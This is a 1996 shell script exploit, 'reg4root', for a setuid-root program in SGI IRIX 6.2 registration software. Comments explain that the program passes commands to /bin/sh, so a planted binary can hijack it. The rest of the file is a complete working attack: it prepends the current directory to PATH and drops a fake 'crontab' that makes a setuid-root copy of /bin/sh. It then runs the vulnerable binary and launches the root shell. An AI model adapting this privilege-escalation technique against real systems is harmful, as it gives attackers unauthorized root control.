#!/bin/sh

# reg4root - Register me for Root!

#

# Exploit a bug in SGI's Registration Software

#

# -Mike Neuman

# mcn@EnGarde.com

# 8/6/96

#

# The bug is contained within the /var/www/htdocs/WhatsNew/CustReg/day5notifier

# program, apparently installed by default under IRIX 6.2. It may appear in

# the other setuid root program (day5datacopier) there, but I haven't had the

# time to check.

#

# SGI is apparently trying to do the right thing (by using execv() instead of

# system(), but apparently some engineer decided that execv() was too limited

# in capabilities, so he/she translated system() to:

#

# execve("/sbin/sh", "sh", "-c", "command...")

#

# This completely eliminates any security benefits execv() had!

#

# The program probably should not be setuid root. There are at least another

# dozen potential security vulnerabilities (ie. _RLD_* variables, race

# conditions, etc)  found just by looking at strings.

#

# Note crontab and ps are only two of the problems. There are probably others.





MYPWD=`pwd`

mkdir /tmp/emptydir.$$

cd /tmp/emptydir.$$



cat <<EOF >crontab

cp /bin/sh ./suidshell

chmod 4755 suidshell

EOF

chmod +x crontab



PATH=.:$PATH

export PATH



/var/www/htdocs/WhatsNew/CustReg/day5notifier -procs 0



./suidshell



cd $MYPWD

rm -rf /tmp/emptydir.$$